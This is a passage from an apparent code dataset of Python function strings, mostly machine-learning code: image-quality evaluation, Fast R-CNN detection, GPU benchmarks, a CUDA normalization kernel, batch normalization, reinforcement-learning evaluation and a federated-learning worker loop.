proc_time.append(elapsed_time)\n np_output = output.cpu().numpy()\n outputs.append(np_output)\n names.append(name)\n\n epoch_size = len(dataset)\n avr_psnr /= epoch_size\n avr_ssim /= epoch_size\n stats = (psnrs, ssims, proc_time)\n\n return avr_psnr, avr_ssim, stats, outputs, names", "def fast_rcnn_detection(self):\n\n\n # (batch_size, num_proposal, 7, 7, channels)\n pooled_feature = self.get_rois(self.rpn_proposals_boxes)\n fast_rcnn_predict_boxes, fast_rcnn_predict_scores = self.fast_rcnn_net(pooled_feature, False)\n\n with tf.variable_scope(\"fast_rcnn_detection\"):\n\n fast_rcnn_softmax_scores = slim.softmax(fast_rcnn_predict_scores) # [-1, num_classes]\n\n # gain the highest category and score and bounding box\n fast_rcnn_categories = tf.argmax(fast_rcnn_softmax_scores, axis=2, output_type=tf.int32) # (N,)\n row_index = tf.range(0, tf.shape(fast_rcnn_categories)[1])\n row_index = tf.expand_dims(row_index, 0)\n multi_row_index = tf.tile(row_index, [self.config.PER_GPU_IMAGE, 1])\n multi_row_index = tf.expand_dims(multi_row_index, axis=-1)\n expand_fast_rcnn_categories = tf.expand_dims(fast_rcnn_categories, axis=-1)\n index = tf.concat([multi_row_index, expand_fast_rcnn_categories], axis=-1)\n fast_rcnn_categories_bboxs = boxes_utils.batch_slice([fast_rcnn_predict_boxes, index],\n lambda x, y: tf.gather_nd(x, y),\n self.config.PER_GPU_IMAGE)\n\n fast_rcnn_categories_scores = tf.reduce_max(fast_rcnn_softmax_scores, axis=2, keepdims=False)# (N,)\n\n detections = self.fast_rcnn_proposals(self.rpn_proposals_boxes,\n fast_rcnn_categories_bboxs,\n fast_rcnn_categories,\n fast_rcnn_categories_scores,\n self.window)\n\n return detections", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(\n individual_losses, params, concat=True\n )\n hist, edges = self._compute_histogram(individual_gradients)\n\n return {\"hist\": hist.float(), \"edges\": edges}", "def precompute_scoring():\n global volume_void_inclusion\n global attract_point_distances\n global perlin_values\n \n volume_void_inclusion = []\n for i,void in enumerate(volumes_void):\n inclusion = gh.PointInBrep(void,points_input,False)\n volume_void_inclusion.append(inclusion)\n \n attract_point_distances = []\n for i,point in enumerate(points_attractor):\n distances = gh.Division(gh.Distance(point,points_input),max_dist)\n attract_point_distances.append(distances)", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1,\n model='resnet50',\n num_warmup_batches=5,\n num_batches=50,\n distortions=False,\n forward_only=True,\n device='cpu',\n data_format='NHWC',\n num_intra_threads=0)", "def __init__process(self, n_cpu):\n global shared_slices\n global shared_data\n\n shared_slices_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_slices = np.frombuffer(shared_slices_base)\n shared_slices = shared_slices.reshape((len(self._q.R), -1))\n\n shared_grad_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_grad = np.frombuffer(shared_grad_base)\n shared_grad = shared_grad.reshape((len(self._q.R), -1))\n\n shared_data_base = mp.Array(ctypes.c_double,\n self._data.size,\n lock=False)\n shared_data = np.ctypeslib.as_array(shared_data_base)\n shared_data = shared_data.reshape(self._data.shape)\n shared_data[:] = self._data\n\n self._pool = mp.Pool(n_cpu)", "def main():\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True # pylint: disable=E1101\n\n comm = MPI.COMM_WORLD\n\n # Use MPI for parallel evaluation\n rank = comm.Get_rank()\n size = comm.Get_size()\n\n env_fns, env_names = create_eval_envs()\n\n env = AllowBacktracking(env_fns[rank](stack=False, scale_rew=False))\n env = BatchedFrameStack(BatchedGymEnv([[env]]), num_images=4, concat=False)\n with tf.Session(config=config) as sess:\n dqn = DQN(*rainbow_models(sess,\n env.action_space.n,\n gym_space_vectorizer(env.observation_space),\n min_val=-200,\n max_val=200))\n player = NStepPlayer(BatchedPlayer(env, dqn.online_net), 3)\n optimize = dqn.optimize(learning_rate=1e-4)\n sess.run(tf.global_variables_initializer())\n\n reward_hist = []\n total_steps = 0\n def _handle_ep(steps, rew, env_rewards):\n nonlocal total_steps\n total_steps += steps\n reward_hist.append(rew)\n if total_steps % 1 == 0:\n avg_score = sum(reward_hist[-100:]) / len(reward_hist[-100:])\n\n\t\t\t# Global Score\n global_score = np.zeros(1)\n local_score = np.array(avg_score)\n print(\"Local Score for \" + env_names[rank] + \" at episode \" + str(len(reward_hist)) + \" with timesteps: \" + str(total_steps) + \": \" + str(local_score))\n comm.Allreduce(local_score, global_score, op=MPI.SUM)\n global_score /= size\n if rank == 0:\n print(\"Global Average Score at episode: \" + str(len(reward_hist)) + \": \" + str(global_score))\n\n\n dqn.train(num_steps=2000000, # Make sure an exception arrives before we stop.\n player=player,\n replay_buffer=PrioritizedReplayBuffer(500000, 0.5, 0.4, epsilon=0.1),\n optimize_op=optimize,\n train_interval=1,\n target_interval=8192,\n batch_size=32,\n min_buffer_size=20000,\n handle_ep=_handle_ep,\n save_interval=None,\n restore_path='./checkpoints_rainbow/model-10' # Model to be evaluated\n )", "def collect_via_nvidia_smi(self, stats_config):\n raw_output = self.run_command([\n '--query-gpu={query_gpu}'.format(query_gpu=','.join(stats_config)),\n '--format=csv,nounits,noheader'\n ])\n\n if raw_output is None:\n return\n\n results = raw_output[0].strip().split(\"\\n\")\n for result in results:\n stats = result.strip().split(',')\n assert len(stats) == len(stats_config)\n index = stats[0]\n for stat_name, metric in izip(stats_config[1:], stats[1:]):\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)", "def calc_contributions(self):\n\n if self.iterations >= self.statistics_batch_num:\n return\n for wrapper in self.get_modules_wrapper():\n filters = wrapper.module.weight.size(0)\n contribution = (wrapper.module.weight*wrapper.module.weight.grad).data.pow(2).view(filters, -1).sum(dim=1)\n if wrapper.contribution is None:\n wrapper.contribution = contribution\n else:\n wrapper.contribution += contribution\n\n self.iterations += 1", "def multi_gpu_generate_rpn_on_dataset(\n args, dataset_name, proposal_file, num_images, output_dir):\n # Retrieve the test_net binary path\n binary_dir = envu.get_runtime_dir()\n binary_ext = envu.get_py_bin_ext()\n #TODO note that code can only be run from root_dir!!\n binary = os.path.join(binary_dir, 'tools/test_net' + binary_ext)\n assert os.path.exists(binary), 'Binary \\'{}\\' not found'.format(binary)\n\n # Pass the target dataset via the command line\n opts = ['TEST.DATASETS', '(\"{}\",)'.format(dataset_name)]\n\n # Run inference in parallel in subprocesses\n outputs = subprocess_utils.process_in_parallel(\n 'rpn_proposals', num_images, binary, output_dir,\n args.load_ckpt, args.load_detectron, opts\n )\n\n # Collate the results from each subprocess\n boxes, scores, ids = [], [], []\n for rpn_data in outputs:\n boxes += rpn_data['boxes']\n scores += rpn_data['scores']\n ids += rpn_data['ids']\n rpn_file = os.path.join(output_dir, 'rpn_proposals.pkl')\n cfg_yaml = yaml.dump(cfg)\n save_object(\n dict(boxes=boxes, scores=scores, ids=ids, cfg=cfg_yaml), rpn_file\n )\n logger.info('Wrote RPN proposals to {}'.format(os.path.abspath(rpn_file)))\n return boxes, scores, ids, rpn_file", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def __call__(self, epoch, update):\n count = 0\n ii = 1\n\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n\n while True:\n i,p = next(self.gen)\n if p.poll():\n count += 1\n grads =[]\n for i,fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs*4)\n grads.append(np.ndarray(self.shapes[i],np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv() #only marginal gains her in the e-05s not worth the complexity to doing it with recv_bytes\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n else:\n ii += 1\n if ii %self.learners == 0:\n time.sleep(0.0001)\n\n if self.warm_start and self.epochs >= epoch:\n if count == self.learners:\n return gradients_list, from_list, global_update_list ,step_list, metrics_list, 0, 2\n else:\n if count == self.num:\n return gradients_list, from_list, global_update_list,step_list, metrics_list, 0, 2", "def _get_fprop_lrn(clss, compute_capability):\n code = r\"\"\"\n%(common)s\n\n__global__ void spool_fprop_lrn(\n const %(type)s* I, %(type)s* O, %(type)s* A,\n float alpha, float beta, float ascale, float bpower, int flags,\n int N, int W, int H, int D, int C,\n int WN, int HWN, int DHWN, int P, int Q,\n int magic_P, int shift_P, int QN, int PQN, int MPQN,\n int pad_c, int pad_d, int pad_h, int pad_w,\n int str_c, int str_d, int str_h, int str_w,\n int S, int RS, int RST, int JRST,\n int magic_S, int shift_S,\n int magic_RS, int shift_RS, int magic_RST, int shift_RST,\n int supP, int supQ, int shlP, int maskP, int shrP,\n int shlQ, int maskQ, int shrQ, int maskN, int shrN\n %(stats_args)s\n )\n{\n __shared__ float rcpWindowSize;\n extern __shared__ int lut[];\n\n int tid = threadIdx.x;\n\n // paralellism is over QMPK dimensions (output pixels and ofm's)\n int n = tid;\n int q = blockIdx.x;\n int mp = blockIdx.y;\n int k = blockIdx.z;\n\n int m = mp * magic_P; m >>= shift_P;\n int p = mp - m*P;\n\n // zigzag q back and forth to improve L2 cache perf\n if (p & 1)\n q = Q - q - 1;\n\n const %(type)s* IonO = I; // input pixel at output location\n I += n;\n IonO += k*MPQN + m*PQN + p*QN + q*N + n;\n O += k*MPQN + m*PQN + p*QN + q*N + n;\n A += k*MPQN + m*PQN + p*QN + q*N + n;\n\n float O_val = beta != 0.0f ? %(cvt)s(__ldg(O)) : 0.0f;\n\n if (tid < 32)\n {\n int kj = k * str_c - pad_c;\n int mt = m * str_d - pad_d;\n int pr = p * str_h - pad_h;\n int qs = q * str_w - pad_w;\n\n int window_size = 0;\n int jrst = tid;\n // this loop generates the LUT (same for pooling and normalization)\n while (jrst < JRST)\n {\n int j = jrst * magic_RST; j >>= shift_RST;\n int rst = jrst - j * RST;\n\n int t = rst * magic_RS; t >>= shift_RS;\n int rs = rst - t * RS;\n\n int r = rs * magic_S; r >>= shift_S;\n int s = rs - r*S;\n\n int x = qs + s;\n int y = pr + r;\n int z = mt + t;\n int c = kj + j;\n\n bool bounds_x = x >= 0 && x < W;\n bool bounds_y = y >= 0 && y < H;\n bool bounds_z = z >= 0 && z < D;\n bool bounds_c = c >= 0 && c < C;\n bool in_bounds = bounds_x && bounds_y && bounds_z && bounds_c;\n\n // Count the total valid slices\n window_size += __popc(__ballot(in_bounds));\n\n int sliceI = c*DHWN + z*HWN + y*WN + x*N;\n\n lut[jrst] = in_bounds ? sliceI : -1;\n jrst += 32;\n }\n\n if(tid == 0)\n {\n //rcpWindowSize = 1.0f / (float)window_size;\n rcpWindowSize = (float)RST/(float)JRST;\n }\n }\n __syncthreads();\n\n float out = 0.0f;\n float denom;\n float sumsquare = 0.0f;\n float input = 0.0f;\n int jrst = 0;\n while (jrst < JRST)\n {\n int slice0 = lut[jrst + 0];\n int slice1 = lut[jrst + 1];\n int slice2 = lut[jrst + 2];\n int slice3 = lut[jrst + 3];\n\n // TODO: May not need to load all slices if they are not used.\n input = jrst + 0 < JRST && slice0 >= 0 ? %(cvt)s(__ldg(I + slice0)) : 0.0f;\n sumsquare += jrst + 0 < JRST && slice0 >= 0 ? input * input: 0.0f;\n input = jrst + 1 < JRST && slice1 >= 0 ? %(cvt)s(__ldg(I + slice1)) : 0.0f;\n sumsquare += jrst + 1 < JRST && slice1 >= 0 ? input * input: 0.0f;\n input = jrst + 2 < JRST && slice2 >= 0 ? %(cvt)s(__ldg(I + slice2)) : 0.0f;\n sumsquare += jrst + 2 < JRST && slice2 >= 0 ? input * input: 0.0f;\n input = jrst + 3 < JRST && slice3 >= 0 ? %(cvt)s(__ldg(I + slice3)) : 0.0f;\n sumsquare += jrst + 3 < JRST && slice3 >= 0 ? input * input: 0.0f;\n\n jrst += 4;\n }\n\n denom = (1 + ascale*sumsquare*rcpWindowSize);\n out = %(cvt)s(__ldg(IonO)) / powf(denom, bpower);\n\n\n // convert back to fp to write out\n %(type)s temp_out = %(cvt_out)s( %(mul_by_scale)s (out*alpha + O_val*beta));\n\n // predicate write with no-op flag\n if (!(flags & 1)) {\n *O = temp_out;\n *A = %(cvt_out)s( %(mul_by_scale)s denom ); // write the denomiantor to address\n }\n\n // collect max abs stats\n int intermediate_max = max_abs(0, temp_out); // compute abs\n %(atomic_max)s\n}\n\"\"\"\n\n template_vals = prepare_template_vals(clss, compute_capability)\n code = code % template_vals\n module = SourceModule(code)\n kernel = module.get_function(\"spool_fprop_lrn\")\n kernel.prepare(\"3P 4f 34I 10I\" + flex_sig(clss[0])) # add superblocking parameter\n return kernel", "def _compute_outputs(self, *args, **kwargs):\n pass\n # self.outputs = self.model(input_ids=self.input_ids, masked_lm_labels=self.input_ids)\n # self.logits = self.outputs[0][0]\n # self.probs = torch.softmax(self.logits, 1)", "def run_bp(self, niter):\n for v in self.vs.values():\n v.init_received()\n for f in self.fs:\n f.init_received()\n marg = {v: self.get_marginal(v) for v in self.vs}\n for it in range(niter):\n for v in self.vs.values():\n v.send()\n for f in self.fs:\n f.send()\n for v in self.vs:\n marg[v] = np.vstack((marg[v], self.get_marginal(v)))\n domains = {v.name: v.orig_domain for v in self.vs.values()}\n return (marg, domains, self.vobs)", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(individual_losses, params)\n layerwise = [\n self._compute_histogram(p, igrad)\n for p, igrad in zip(params, individual_gradients)\n ]\n\n hist = sum(out[0] for out in layerwise)\n edges = layerwise[0][1]\n\n result = {\"hist\": hist, \"edges\": edges}\n\n if self._keep_individual:\n result[\"param_groups\"] = len(params)\n\n for idx, (hist, edges) in enumerate(layerwise):\n result[f\"param_{idx}\"] = {\"hist\": hist, \"edges\": edges}\n\n return result", "def update_probs(self, measure, p, enemy_net = False):\n tmp_net = []\n net_size = len(self.net) \n if not enemy_net:\n net = self.net\n else:\n net = self.enemy_net\n #Maps a given color to its corresponding column in the color's \n #probability table.\n if measure == GREEN:\n color = 0\n elif measure == YELLOW:\n color = 1\n elif measure == ORANGE:\n color = 2\n elif measure == RED:\n color = 3\n #Obtains new probabilities by using the distance between the\n #observed position (the one measured) and any other position.\n for j in range(0, net_size):\n distance = self.__get_distance(p, j)\n if distance == 0: #When updating the measured position's probability.\n tmp_net.append(net[j].value * self.ct[0][color])\n elif distance == 1: #When updating an adjacent position to the one measured.\n tmp_net.append(net[j].value * self.ct[1][color])\n elif distance == 2: #When updating a position at two cells from the one measured.\n tmp_net.append(net[j].value * self.ct[2][color])\n elif distance == 3: #When updating a position at three cells from the one measured.\n tmp_net.append(net[j].value * self.ct[3][color])\n else: #When updating a position at four or more cells from the one measured.\n tmp_net.append(net[j].value * self.ct[4][color])\n #Obtains summation of new probabilities in order to execute \n #a posterior normalization.\n total = sum(tmp_net)\n #Normalizes new probabilities and assigns them to its \n #corresponding position.\n for i in range(0, net_size):\n net[i].value = tmp_net[i]/total", "def update_concentrations_batch(self): \n #--- Update the cell concentrations ---\n # dX_i/dt = mu_i*(1-rmp/100)*X_i*(1 - sum(i,(1-rmp/100)X(i))/carrying_capacity) or \n # (X_i(t+dt) - X_i(t))/dt = mu*(1-rmp/100)*X_i(t)*(1 - sum(i,(1-rmp/100)*X_i(t))/carrying_capacity)\n # where rmp is the random mortality percentage\n # If concentration is negative set it to zero\n members_gDW_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_gDW_per_ml = 1 - members_gDW_per_ml_total/self.carrying_capacity['gDW_per_ml']\n if len([member for member in self.community_members if member.organism.cells_per_ml != None]) == len(self.community_members):\n members_cells_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_cells_per_ml = 1 - members_cells_per_ml_total/self.carrying_capacity['cells_per_ml']\n\n for member in self.community_members:\n # We always need gDW_per_ml to update compound concentrations but\n # providing cells_per_ml is optional\n member.organism.gDW_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1-self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t]*self._logisticG_factor_gDW_per_ml*self._dt + member.organism.gDW_per_ml[self._t],0)\n\n if member.organism.cells_per_ml is not None:\n member.organism.cells_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t]*self._logisticG_factor_cells_per_ml*self._dt + member.organism.cells_per_ml[self._t],0)\n\n # Total death rate (** newly added for DMMM_mortality **)\n if member.organism.mu[self._t] < 0:\n # In thise case random_mortality_rate has already been incorporated into mu\n # (see DMMM.py)\n member.organism.total_death_rate[self._t] = member.organism.mu[self._t] \n else:\n member.organism.total_death_rate[self._t] = member.organism.random_mortality_rate\n\n\n #--- Update shared compound concentrations ---\n # dC/dt = f where, f = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool_rate\n # (C(t+dt) - c(t))/dt = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool \n # where, dead_pool_rate = sum(k,-self.cell_pool_factor*cell_pool_concentration_k*total_death_rate_k*X_k)\n # Here, cell_pool_concentration is the concentration of the compound pool \n # per gDW or per cells, which should have already been assigned to each \n # shared compound. The minus sign is because total_death_rate is negative\n # while dead_pool_rate must be non-negative. Here, self.cell_pool_factor is\n # the factor that should be multiplied by concentration of that compound \n # (this is because sometimes we want to explore how the growth is affected if \n # the cell pool is higher than the ones reported experimentally)\n total_cmps_conc = sum([cmp.concentration[self._t] for cmp in self.shared_compounds])\n self._logisticG_factor_cmps = 1 - total_cmps_conc/self.carrying_capacity['compounds_mM']\n self._f = dict([(cmp,None) for cmp in self.shared_compounds])\n\n if not hasattr(self,'cell_pool_factor'):\n self.cell_pool_factor = 1\n\n for shared_cmp in self.shared_compounds:\n dead_pool_rate = -sum([self.cell_pool_factor*shared_cmp.cell_pool_concentration[member.organism.id]*member.organism.total_death_rate[self._t]*1000*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n if dead_pool_rate < 0:\n raise userError('dead_pool_rate is negative')\n\n f = sum([r.flux[self._t]*1000*r.model.organism.gDW_per_ml[self._t] for r in shared_cmp.reactions]) + dead_pool_rate\n self._f[shared_cmp] = f\n\n conc = f*self._logisticG_factor_cmps*self._dt + shared_cmp.concentration[self._t]\n\n if conc >= 0 or (conc < 0 and abs(conc) <= 1e-9):\n conc = max(conc,0)\n\n shared_cmp.concentration[self._t + self._dt] = conc", "def bn_update(loader, model, device):\n if not check_bn(model):\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print('no bn in model?!')\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>!')\n # return model\n\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n\n model = model.to(device)\n pbar = tqdm(loader, unit=\"samples\", unit_scale=loader.batch_size)\n for sample in pbar:\n inputs, targets, target_lengths = sample['input'].to(device), sample['label'].to(device), sample['label_length'].to(device)\n\n inputs = inputs.to(device)\n b = inputs.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n # model(inputs)\n # TODO:\n model(inputs, False, targets, target_lengths, 275, test_dataset.tokenizer)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))\n return model", "def benchmark_ng_xla_batch64_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, batch_size=64, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n model='resnet50', batch_size=128, distortions=False,\n optimizer='momentum')", "def batchnorm_compute(self):\n self.batchnorm_compute_tiling_wh_single_c()\n\n self.tik_instance.BuildCCE(kernel_name=self.kernel_name,\n inputs=[self.input_gm,\n self.gamma_gm,\n self.beta_gm],\n outputs=[self.output_gm],\n flowtable=[self.input_n, self.input_c,\n self.input_h, self.input_w,\n self.inputtype, self.output_n,\n self.output_c, self.output_h,\n self.output_w, self.outputtype,\n self.gamma_c, self.gammatype,\n self.beta_c, self.betatype,\n self.param1, self.param2,\n self.param3, self.param4,\n self.param5, self.param6,\n self.param7, self.param8,\n self.param9, self.param10],\n enable_l2=True,\n config={\"double_buffer_non_reuse\": True,\n \"out_of_bound_sync_check\": True})\n return self.tik_instance", "def calculate_batch_metrics(self):\n pass", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(_get_gp_ucb_dim(gp), anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" A UCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, _get_gp_ucb_dim(gp))))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n #######################################################################\n #Compute mean and variance of each element of the data.\n sample_mean = np.mean(x,axis = 0)\n sample_var = np.var(x,axis = 0)\n #Normalize\n x_normalized = (x - sample_mean) / (np.sqrt(sample_var + eps))\n #scale and shift.\n out = x_normalized * gamma + beta\n #Update running mean and variance.\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(sample_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n #Normalize with running mean and var.\n x_normalized = (x - running_mean) / (np.sqrt(running_var + eps))\n #scale and shift.\n out = gamma * x_normalized + beta\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(running_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def run(self):\n # Single GPU flag\n single_gpu = True if size()==1 else False\n print_rank(f\"Single GPU flag Client: {single_gpu}\", loglevel=logging.DEBUG)\n \n if not single_gpu:\n while True: # keeps listening for incoming server calls\n\n # Initialize tensors -- required by torch.distributed\n command, client_idx, mode = 0, 0, 0 # int\n lr, nround = torch.zeros(1), torch.zeros(1) # float\n\n # Read command\n command = _recv(command)\n print_rank(f\"Command received {command} on worker {rank()}\", loglevel=logging.DEBUG)\n\n # Receive server data -- lr, model_params\n if command == COMMAND_UPDATE:\n print_rank(f\"COMMMAND_UPDATE received {rank()}\", loglevel=logging.DEBUG) \n lr = _recv(lr, 0)\n model_params = _recv_gradients(0)\n nround = _recv(nround, 0)\n server_data = (lr, model_params, int(nround))\n print_rank(f\"Received lr: {lr} and n_params: {len(model_params)} - round {nround}\", loglevel=logging.DEBUG)\n \n elif command == COMMAND_TRAIN:\n print_rank(f\"COMMMAND_TRAIN received {rank()}\", loglevel=logging.DEBUG)\n \n # Init profiler in training worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n profiler.enable()\n \n # Receive client id from Server\n client_idx = _recv(client_idx)\n print_rank(f\"Cliend idx received from Server: {client_idx}\", loglevel=logging.DEBUG)\n\n # Instantiate client\n client_to_process = Client(\n [client_idx],\n self.config,\n self.config['client_config']['type'] == 'optimization') \n \n # Execute Client.get_data()\n client_data = client_to_process.get_client_data()\n\n # Execute Client.process_round()\n output = client_to_process.process_round(client_data, server_data, self.model, self.data_path)\n\n # Send output back to Server\n if dist.get_backend() == \"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_train_output(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TESTVAL:\n print_rank(f\"COMMMAND_TESTVAL received {rank()}\", loglevel=logging.DEBUG)\n\n # Init profiler in validation worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n profiler.enable()\n \n # Receive mode and client id from Server\n mode = _recv(mode)\n mode = \"test\" if mode == -2 else \"val\"\n client_idx = _recv(client_idx)\n print_rank(f\"Client idx received from Server: {client_idx}, {mode}\", loglevel=logging.DEBUG)\n \n # Get client and dataset\n clients = self.val_clients if mode == \"val\" else self.test_clients\n dataset = self.val_dataset if mode == \"val\" else self.test_dataset\n clients_queue = clients.copy()\n assert 0 <= client_idx < len(clients_queue)\n client_to_process = clients_queue.pop(client_idx)\n\n # Execute Client.get_data()\n client_data = client_to_process.get_client_data(dataset)\n \n # Execute Client.run_testvalidate()\n output = client_to_process.run_testvalidate(client_data, server_data, mode, self.model)\n\n # Send output back to Server\n if dist.get_backend() == \"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n _, metrics, num_instances = output\n metrics['num']= {'value': float(num_instances), 'higher_is_better': False}\n output = metrics\n print_rank(f\"Worker {rank()} output {output}\", loglevel=logging.DEBUG)\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_metrics(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker {rank()} sent output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TERMINATE:\n print_rank(f\"COMMMAND_TERMINATE received {rank()}\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n 